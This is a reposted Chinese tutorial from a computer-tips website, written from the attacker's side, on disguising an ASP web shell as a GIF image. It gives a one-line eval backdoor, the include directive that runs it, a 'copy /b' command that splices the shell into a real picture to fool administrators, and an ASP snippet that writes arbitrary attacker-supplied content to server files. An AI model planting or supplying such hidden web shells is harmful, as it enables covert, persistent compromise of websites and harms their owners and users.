收藏本站 
广告服务 
网站地图 
>> 为你提供近10万篇各类电脑技术文章、网络技术教程、软件技术文章、网页设计教程、平面设计教程、数据库技术教程等方面的电脑教程!
先飞电脑技术网技术文章网络技术网络安全
网络编程 | 网站建设 | 网络技术 | 设计教程 | 软件教学 | 程序开发 | 数据库开发 | 教育认证 | 硬件维护 | 媒体动画 | 机械电子 |

ASP图片木马运行方式解析

[ 作者:佚名    转贴自:网络转载    阅读次数:77    更新时间:2007-11-15 14:28:00   录入:刘光勇 ]         
    一个网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马。 

   asp木马已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子asp 
后门还是我众马中的首选,现在我们就把它作成图片asp木马。 

首先我们把冰狐浪子asp木马服务端直接该后缀名为gif,记得用容错格式: 

<SCRIPT RUNAT=SERVER LANGUAGE=javascript>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT> 

一、include给我们指路 

接下来要使用include指令,这个指令也是我们常常看到的,但是它有一个很特别的功能,可能你就没有用到过了。这就是可以调用位于其它文件中的函数,不管它的后缀名是什么,哪怕是个图片文件。 

然后我们新建一个asp文件,在里面写入<!--#include file="asp.gif"-->,当然你也可以把它插入到任何asp文件的头部或者尾部,仅仅就这一句话。asp.gif就是冰狐浪子asp木马服务端,也是一句话,这个图片asp木马就做好了。 

不过这里还有一个小问题,虽然网站里图片很多,但如果管理员不小心打开这个图片,在IE上显示的是一把小红叉,他会怎么想呢? 

为了不让人怀疑,要让我们的图片美人动起来,让它成为真正的gif文件! 

二、copy给我们加油 

把asp.gif改名为asp.asp,然后去找个图片来,至于什么内容的图片,就看你自己的爱好啦,不过最好不要超过20kb,大了执行的速度就慢,把它保存为1.gif。 

再启动windows下的dos窗口,键入copy 1.gif /b + asp.asp /a asp.gif 

其中参数/b 是指定以二进制格式复制、合并文件。参数/a 是指定以ascll格式复制、合并文件。这里要注意文件的顺序。执行完后就会生成asp.gif,这就是我们的冰狐浪子asp木马服务端。不过现在它已经伪装成一个婷婷玉立的美人了,嘿嘿!如果要插入其他asp文件中,请插入下面代码 

<%  
on error resume next  
id=request("id")  
if request("id")=1 then  
testfile=Request.form("name")  
msg=Request.form("message")  
set fs=server.CreateObject("scripting.filesystemobject")  
set thisfile=fs.OpenTextFile(testfile,8,True,0)  
thisfile.WriteLine(""&msg& "")  
thisfile.close  
set fs = nothing  
%> 
<form method="POST" ACTION="你插入文件的文件名?id=1"> 
<!--#include file="UploadFile/asp.gif"--> 
<% end if %> 


这里我们用一个id参数来蔽掉了,图片所产生的乱码。

文章首页【加入到收藏夹】告诉好友】【打印此文】【关闭窗口
  版权声明:本站提供的“ASP图片木马运行方式解析”版权归文章所有者,转载请注明出处!
 ·上一篇文章:WEP、WPA无线加密方式安全对比      ·下一篇文章:加强Windows安全性的十大建议
相关文章
·ASP.Net中生成二维的表格的代码[66]
·VS2005 中调试JavaScript的方法[12]
·如何实现ASP.NET网站个性化?[23]
·在Asp.net中使用HtmlArea编辑器[76]
·Flash场景中影片剪辑的修改小技巧[91]
网站主页 | 收藏本页 | 联系我们 | 广告服务 | 站点地图 | 会员注册 | 隐私政策 | 内容指正

联系QQ:先飞电脑技术网站事务联系QQ,点击可以直接留言. 32933427 电话:13710542091 [世界排名] 鄂ICP备05005890号 先飞电脑教程网